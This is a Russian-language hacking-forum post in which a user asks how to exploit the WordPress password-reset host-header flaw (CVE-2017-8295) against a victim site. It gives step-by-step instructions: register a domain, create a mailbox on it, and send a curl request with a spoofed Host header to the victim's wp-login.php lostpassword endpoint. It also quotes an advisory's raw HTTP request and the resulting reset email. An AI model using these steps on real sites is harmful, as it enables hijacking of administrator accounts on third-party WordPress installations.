Показать сообщение отдельно

  #9  
Старый 06.11.2017, 02:19
itprepod
Guest
Сообщений: n/a
Провел на форуме:
1868

Репутация: 0
По умолчанию

Цитата:
Сообщение от M_script  
M_script said:

С первой попытки не угадали. Попробуйте еще раз.
Или с помощью этой уязвимости можно подменить email админа при заказе письма по восстановлению пароля?

Вот здесь:

https://exploitbox.io/vuln/WordPress...2017-8295.html

Показано, что письмо по восстановлению пароля приходит от wordpress@attackers-mxserver.com

Вместо attackers-mxserver.com может быть любой другой домен.

Но перед атакой получается мне нужно создать почту на домене.

Порядок действий:

1. Регаю домен. Пусть будет forhackwp.ru

2. Делаю почту wordpress@forhackwp.ru

3. Запускаю Линукс. Пишу в терминал:

curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://тут-домен-жертвы/wp-login.php?action=lostpassword

4. Жду письма на свою почту: wordpress@forhackwp.ru ?

Или нет?

Вот тут:

https://exploitbox.io/vuln/WordPress...2017-8295.html

Написано (перевод):

Если злоумышленник отправляет запрос, аналогичный приведенному ниже WordPress по умолчанию

установка, доступная IP-адрес (IP-основе виртуального хоста):

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1

Host: injected-attackers-mxserver.com

Content-Type: application/x-www-form-urlencoded

Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

------------------------

WordPress будет вызвать функцию сброса пароля для учетной записи пользователя с правами администратора.

Из-за измененного заголовка узла имя_сервера будет присвоено значение

имя хоста по выбору злоумышленника.

В результате WordPress передаст следующие заголовки и текст сообщения электронной почты

/usr/bin / обертка sendmail:

------[ полученная электронная почта ]-----

Subject: [CompanyX WP] Password Reset

Return-Path:

From: WordPress

Message-ID:

X-Priority: 3

MIME-Version: 1.0

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin

If this was a mistake, just ignore this email and nothing will happen.

To reset your password, visit the following address:

"]http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login =admin>[/URL]

-------------------------------

Как сделать HTTP запрос?
 
Ответить с цитированием